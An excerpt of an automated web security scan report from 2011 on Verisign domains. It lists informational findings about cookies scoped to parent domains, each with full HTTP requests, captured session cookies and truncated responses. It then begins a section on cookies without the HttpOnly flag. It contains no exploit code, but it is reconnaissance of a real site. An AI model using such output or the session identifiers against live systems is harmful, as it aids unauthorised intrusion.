GET /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:33 GMT Server: ApacheSet-Cookie: TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 22968 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* * Copyright . 1999-2009 TeaLeaf Technology, Inc. * All rights reserved. * * THIS SOFTWARE IS PROVIDED BY TEALEAF ``AS IS'' ...[SNIP]...
9.71. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/trustcenter_capture_payment.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/trustcenter_capture_payment.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: ApacheSet-Cookie: TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 4605 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function onPaymentMethodChange(){var paymentMethodObj=getElement("enrollment.payment.paymentMethod");if(paymentMethodObj!==null){var radioLength=paymentMethodObj.length;var index=0;for(var i=0;i<radi...[SNIP]...
9.72. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/trustcenter_product_selector.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/trustcenter_product_selector.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:35 GMT Server: ApacheSet-Cookie: TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 19769 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var premiumSupportFee=0;var pciComplianceFee=0;var pricingMatrix=[];var validityObjFive=null;var validityObjFour=null;var validityObjThree=null;var validityObjTwo=null;var validityObjOne=null;var pro...[SNIP]...
9.73. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/utility.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/utility.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: ApacheSet-Cookie: TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:09 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 8013 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript var menuItemCurrentlyHasFocus=false;function MM_findObj(n,d){var p,i,x;if(!d){d=document;} if((p=n.indexOf("?"))>0&&parent.frames.length){d=parent.frames[n.substring(p+1)].document;n=n.substring(0,p)...[SNIP]...
9.74. https://trust-center.verisign.com/rcm/verisign/style/brand.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/brand.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/brand.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 7437 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css @import "vrsn.css"; #vrsn_standard_bar{background-color:#9B0033;clear:both;color:#FFFFFF;font-size:.8em;height:2em;text-align:center;width:100%;} #vrsn_standard_bar_footer{border-top:1px solid #EDEDEE...[SNIP]...
9.75. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/capture_payment.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/capture_payment.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: ApacheSet-Cookie: TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 2075 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css /*import from capture_payment.css - Coakley 10_5_2010 */ .radio_button {width:180px;} .blurb {padding-left:5px;padding-bottom:10px;} #tax_exemption_section {margin-left:35px;} .content_line { position...[SNIP]...
9.76. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/minimal_form.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/minimal_form.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 3324 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #quick_signin_box {position:relative;top:0px;margin:0px;} .minimal-form-gray, .minimal-form-gray * {background-color:gray;} .minimal-form, .minimal-form-gray{border:solid 1px #5C554B;height:auto;t...[SNIP]...
9.77. https://trust-center.verisign.com/rcm/verisign/style/module.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/module.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/module.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 698 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #ratepointbox{background-color:#FFFFFF;border:1px solid #999999;margin-bottom:10px;padding:1px;width:196px;} #ratepointbox .header{background-image:url(../images/ratepoint_header_bg.gif);background-po...[SNIP]...
9.78. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/product_selector.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/product_selector.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 9496 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #comparison_chart_panel{position:absolute;right:20px;top:0;} #product_ssp_ev{background-image:url(../images/SSP_EV.jpg);background-position:top;background-repeat:no-repeat;float:left;margin-bottom:0;...[SNIP]...
9.79. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/style/vrsn.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/style/vrsn.css HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: ApacheSet-Cookie: TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 30719 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css body{color:#000;font-family:arial, helvetica, sans-serif;font-size:12px;height:100%;margin:0} a:link,a:visited{color:#1446A8;text-decoration:underline} h3{margin:0 0 0.8em;padding:0 0 0 1em;width:98%}...[SNIP]...
9.80. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/assets/shared/images/sm_004276_oo.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /assets/shared/images/sm_004276_oo.gif HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:47 GMT Server: ApacheSet-Cookie: v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch Last-Modified: Wed, 19 Jan 2011 20:21:22 GMT ETag: "2e58332-255-49a38c2aff480" Accept-Ranges: bytes Content-Length: 597 X-UA-Compatible: IE=EmulateIE7 Content-Type: image/gif GIF89a . .....Bv...!..NETSCAPE2.0.....!.. ....,.... . ......h.i.X.oU...m. ..!.. ....,...... ......y........2.M.Z..!.. ....,...... .....b.x...bS.. .!.. ....,...... ...........s.M. .!.. ....,...... .......[SNIP]...
9.81. http://www.verisign.co.uk/hp07/i/vlogo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.co.uk
Path:
/hp07/i/vlogo.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hp07/i/vlogo.gif HTTP/1.1 Host: www.verisign.co.uk Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:05 GMT Server: ApacheSet-Cookie: v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk Last-Modified: Mon, 04 Apr 2011 20:53:46 GMT ETag: "29480d7-13e4-4a01df4a82a80" Accept-Ranges: bytes Content-Length: 5092 Content-Type: image/gif GIF89aZ.)...."""..0.........DDD.........333........%UUU.........#. ..............-...-)*.........fff!..... .....www..(..#"..3/0......&"#.........\YZigh...0,-$ !*&'.............F..*.........PLM......M...[SNIP]...
9.82. https://www.verisign.com/assets/visual-sciences/vip/zig.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/assets/visual-sciences/vip/zig.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /assets/visual-sciences/vip/zig.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: https://idprotect.verisign.com/toolbar/activate.v Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.verisign.com Connection: Keep-Alive Cache-Control: no-cache
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:55 GMT Server: ApacheSet-Cookie: v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com Last-Modified: Wed, 19 Jan 2011 20:34:24 GMT Accept-Ranges: bytes Content-Length: 2602 Expires: Sun, 09 Oct 2011 21:47:55 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-javascript //REFERENCE PAGE TAG var ct = "<img src="; var cd = "//www.verisign.com"; //this should contain the domain of the web site var cu = "/assets/visual-sciences/vip/zag.gif?Log=1"; //this should contai...[SNIP]...
10. Cookie without HttpOnly flag set
previous
next
There are 118 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
